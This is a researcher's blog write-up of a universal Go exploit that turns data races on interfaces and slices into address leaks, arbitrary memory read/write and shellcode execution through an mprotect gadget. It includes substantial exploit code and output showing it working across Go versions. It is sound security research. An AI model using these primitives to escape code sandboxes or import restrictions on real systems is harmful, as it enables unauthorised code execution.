Saturday, January 01, 2022

Universal Go exploit using data races, no imports

In the last two blog posts, I described a challenge and exploits to get code execution from arbitrary Go code allowed to import only the fmt package, at a fixed Go version 1.13.3 and without PIE.

These factors made the challenge easier for a CTF: the fmt package gives a nice leak with %p, and no PIE plus the fixed Go version 1.13.3 allow hardcoding addresses and relying on deterministic behavior of code layout, heap, compiler optimizations and calling convention.

Is it possible to achieve arbitrary code execution on any Go version, even with PIE, and with no package import at all, just builtins? Yes! It's been sitting in my exploits folder for long enough that it's time to write about it.

Data races and exploit primitives

As discussed before, Go's current implementation of interfaces and slices as multiword values gives us the ability to race them:
  • interface race gives us a type confusion, which we can use to confuse an interface with a struct of 2 uints to leak its internal representation of type + pointer, giving us an addrOf primitive to replace our fmt.Sprintf("%p")
  • slice race gives us the ability to write out of bounds, which we can use to build an arbitrary slice (data, length and capacity), giving us an arbitrary read/write primitive
We're going to build addrOf first, as it is useful to precisely and reliably exploit the slice race. An exploit exclusively using the slice race is left as an exercise to the reader (spray, race and check).

Interface race

The building block of our interface race will be to race 2 structs matching this interface:
type racerValue interface {
  Value() uint64
}
We then define structs matching this interface. The first struct simply holds whatever we want to leak, as an interface, so it is internally represented as a type and a pointer to the data:
type holdInterface struct {
  i interface{}
}

func (s holdInterface) Value() uint64 {
  return 0
}
The second struct serves to leak the address of the interface data pointer, so we overlay the interface representation of type + pointer:
type holdInterfaceAddress struct {
  typ  uint64
  addr uint64
}

func (s holdInterfaceAddress) Value() uint64 {
  return s.addr
}
The third struct serves to leak the value behind the address of the interface data pointer, simply by defining it as a pointer and dereferencing it. We could go on like this, but we don't need more.
type holdInterfaceValue struct {
  typ  uint64
  addr *uint64
}

func (s holdInterfaceValue) Value() uint64 {
  if s.addr != nil {
    return *s.addr
  }
  return 0
}
The interface race gives us a type confusion where the data is the first struct (what we want to leak) but the type points to the second or third struct, depending on what we want to read (address or value).
Then the race is roughly:
func raceLeak(data, leak racerValue) uint64 {
  confused := data
  done := false
  go func() {
    for {
      confused = data
      confused = leak
      if done {
        return
      }
    }
  }()
  for {
    if v := confused.Value(); v > 0 {
      done = true
      return v
    }
  }
}

Avoiding compiler optimizations

There's a problem with the previous code: over the years, the Go compiler became smarter to eliminate useless code, such as our data race flipping one variable between two values:
for {
  confused = data
  confused = leak
}
The compiler realizes it's useless and eliminates the whole loop (disassemble the binary to see for yourself).

I had to change my approach from time to time; as of Go 1.18 (and all versions before), this works:
dontOptimize := confused
for {
  confused = data
  // this call makes the compiler think confused is being used,
  // so it doesn't optimize away the loop
  func() { dontOptimize = confused }()
  confused = leak
}
_ = dontOptimize // otherwise compiler complains about unused variable

First primitive: addrOf

We now have enough to build our first addrOf primitives:
func addrOf(x interface{}) uint64 {
  return raceLeak(&holdInterface{x}, &holdInterfaceAddress{})
}

func addrOfValue(x interface{}) uint64 {
  return raceLeak(&holdInterface{x}, &holdInterfaceValue{})
}
And from there, we can look at exploiting the slice race to build our arbitrary read/write primitive.

Slice race

To exploit the race reliably across Go versions, we need:
  • an attacking slice: we will race between this one and a longer slice, aiming for a situation where the data pointer refers to the attacking slice but the length is still that of the long slice, so we can reach out of bounds of the attacking slice.
  • a victim slice somewhere after: we will overwrite its data pointer, length and capacity
One way I found is to first allocate the attacking slice normally:
attacker := make([]uint64, 1)
then to hold the victim slice inside a struct, and lay out a long contiguous slice of victim slices, making it a large allocation, so it most likely lands somewhere after our previous allocation:
type victimSlice struct {
  s []byte
}

targets := make([]victimSlice, 4096)
Then we just have to aim at the first element: targets[0].s.

To do that, we need to build a slice with a length long enough to reach it. We use the interface race to read the addresses of the attacker and targets slices, then we just calculate the difference (if it's ever negative, it means our allocation strategy didn't work and our victim got allocated before the attacker).
targetsAddr := addrOfValue(targets)
attackerAddr := addrOfValue(attacker)
diff := int64(targetsAddr - attackerAddr)
if diff < 0 {
  panic("attacker after target")
}
The out-of-bounds index from the attacker slice to reach our victim (targets[0].s) is therefore diff/sizeof(uint64), and since we overwrite the victim's full header (a slice header is 3 uint64s: data, length, capacity), the long slice length needs to be at least diff/8+3.
idx := diff / 8
long := make([]uint64, diff/8+3)
Then the race is roughly:
func sliceAt(addr, length uint64) []byte {
  [...] allocate attacker, targets, long, calculate idx
  confused := attacker
  go func() {
    for {
      confused = long
      confused = attacker
      if targets[0].s != nil {
        return
      }
    }
  }()
  for {
    func() {
      defer func() { recover() }()
      // confused points to attacker but still len/cap of long
      confused[idx] = addr
      confused[idx+1] = length // len
      confused[idx+2] = length // cap
    }()
    if targets[0].s != nil {
      return targets[0].s
    }
  }
}

Second primitive: arbitrary read/write

We can now create an arbitrary slice. We can't make it start at address 0 (a nil slice, unusable), but we can start it at 1 with addresses just off by one, and if we set the length to 2^64-1 then we can address the entire memory:
func arbitraryRW() memory {
  return sliceAt(1, 0xffffffffffffffff)
}

type memory []byte

func (m memory) read(addr uint64) byte {
  return m[addr-1]
}

func (m memory) write(addr uint64, value byte) {
  m[addr-1] = value
}
We can extend it with helper functions like write8(addr, value uint64) and index(from, max uint64, what []byte) uint64 to find a sequence of bytes. Omitted here for brevity, see full exploit at the end.

Code execution

Instead of directly calling execve, let's aim for shellcode execution. We can store the shellcode as a constant but it will not be executable, so first we need to call mprotect to set the shellcode page as executable.

We can store a few executable bytes inside immediates (bring our own gadget) and use the arbitrary read/write to find their address. But how do we jump to them? We also want this to be portable across all Go versions, even when built with PIE. Go's calling convention used to pass all arguments on the stack, but since Go 1.18 it uses registers. That's OK: we can pass enough arguments that the rest spills onto the stack, and as long as the two layouts don't overlap, we're good in both cases.

Here's what we can do:
  • we'll set up a short gadget reading arguments from the stack and executing syscall then returning, 8 bytes so it fits a uint64 immediate:
      5f ; pop rdi # it's a call so first is saved rip
      5f ; pop rdi # addr
      5e ; pop rsi # len
      5a ; pop rdx # prot
      58 ; pop rax # sys_mprotect
    0f05 ; syscall
      c3 ; ret
    
  • we use a function variable (i.e. a function pointer), get its address, write to it to change its destination to the gadget, then call it
  • we'll lay out the arguments to be compatible with Go before and after 1.18
It gives us:
m := arbitraryRW()
mainAddr := addrOfValue(main)
shellcodeAddr := m.index(mainAddr, 0x100000, []byte(shellcode[:8]))
find := func(v uint64) uint64 { return m.index(mainAddr, 0x1000, p64s(v)) }

var call func(uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64)
callAddr := addrOf(&call)

// pop rdi; pop rdi; pop rsi; pop rdx; pop rax; syscall; ret
// pop twice rdi because first will be saved rip from the call
gadget := find(0xc3050f585a5e5f5f)
gadgetAddr := addrOf(&gadget)

m.write8(callAddr, gadgetAddr)

addr := shellcodeAddr & ^(PAGE_SIZE - 1)
const len = PAGE_SIZE * 2
const PROT_READ = 4
const PROT_WRITE = 2
const PROT_EXEC = 1
const prot = PROT_READ | PROT_WRITE | PROT_EXEC
const sys_mprotect = 10
call(
  // Go < 1.18 calling convention is the stack
  addr,          // rdi
  len,           // rsi
  prot,          // rdx
  sys_mprotect,  // rax
  shellcodeAddr, // ret

  0, 1, 2, 3, // unused

  // Go >= 1.18 calling convention uses registers, then stack
  // luckily for us this does not overlap so we can prepare both
  addr,          // rdi
  len,           // rsi
  prot,          // rdx
  sys_mprotect,  // rax
  shellcodeAddr, // ret
)

Compatibility

It works on current tip (Go 1.18), regardless of PIE:
$ go version
go version devel go1.18-6178d25fc0 Wed Dec 29 20:20:32 2021 +0000 linux/amd64
$ go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ go run -buildmode=pie exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
As well as old versions:
$ for v in 1.{17..8} 1.7.6 1.6.4 1.5.4; do
    go install golang.org/dl/go${v}@latest >/dev/null 2>&1 || continue
    go$v download >/dev/null 2>&1
    go$v version
    go$v run exploit.go
  done
go version go1.17 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.16 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.15 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.14 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.13 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.12 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.11 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.10 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.9 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.8 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.7.6 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.6.4 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.5.4 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
To test further back we have to compile from source, and also set GOMAXPROCS=2 as the default was 1 before go1.5:
$ ( git clone -b release-branch.go1.4 --depth 1 https://go.googlesource.com/go go1.4
    cd go1.4/src
    ./make.bash )
$ go1.4/bin/go version
go version go1.4-bootstrap-20170531 linux/amd64
$ GOMAXPROCS=2 go1.4/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
From there, building from a modern system requires small tweaks:
$ ( git clone -b release-branch.go1.3 --depth 1 https://go.googlesource.com/go go1.3
    cd go1.3/src
    CGO_ENABLED=0 CFLAGS='-Wno-implicit-fallthrough -Wno-shift-negative-value' ./make.bash )
$ go1.3/bin/go version
go version go1.3.3 linux/amd64
$ GOMAXPROCS=2 go1.3/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ ( git clone -b release-branch.go1.2 --depth 1 https://go.googlesource.com/go go1.2
    cd go1.2/src
    sed -i 's/-Werror//' make.bash
    sed -i 's/"-Werror",//' cmd/dist/build.c
    CGO_ENABLED=0 ./make.bash )
$ go1.2/bin/go version
go version go1.2.2 linux/amd64
$ GOMAXPROCS=2 go1.2/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ ( git clone -b release-branch.go1.1 --depth 1 https://go.googlesource.com/go go1.1
    cd go1.1/src
    sed -i 's/-Werror//' make.bash
    sed -i 's/"-Werror",//' cmd/dist/build.c
    CGO_ENABLED=0 ./make.bash )
$ go1.1/bin/go version
go version go1.1.2 linux/amd64
$ GOMAXPROCS=2 go1.1/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
Unfortunately I couldn't get go1 to compile on my system (I'm getting a weird fault), but it probably works as well.

Full exploit

On github: https://github.com/StalkR/misc/blob/master/go/gomium/exploit.go

In total, the exploit uses 6 data races:
  1. read attacker slice address
  2. read victim slice address
  3. write slice out of bounds
  4. read address of main
  5. read address of function pointer
  6. read address of gadget
Maybe we can do it in fewer (e.g. by using the slice race only once), but the race works well enough that it's fine in practice (usually won in fewer than 100 iterations, so it's really fast).

Conclusion

As said before, while a fun exercise, it's pretty useless under the current Go threat model. Anything accepting arbitrary Go code and running it should be sandboxed.

However, if we imagine organizing Go packages by what they do (imports) and enforcing some guarantees around that (think manifests), such an exploit could be a way around it. Because of that, there are people looking into making these data races non-exploitable, e.g. by boxing the data structures: storing them elsewhere and only atomically moving a single pointer to them. This comes with a performance impact, but maybe we'll see it in a future Go version. Until then, happy new year :)
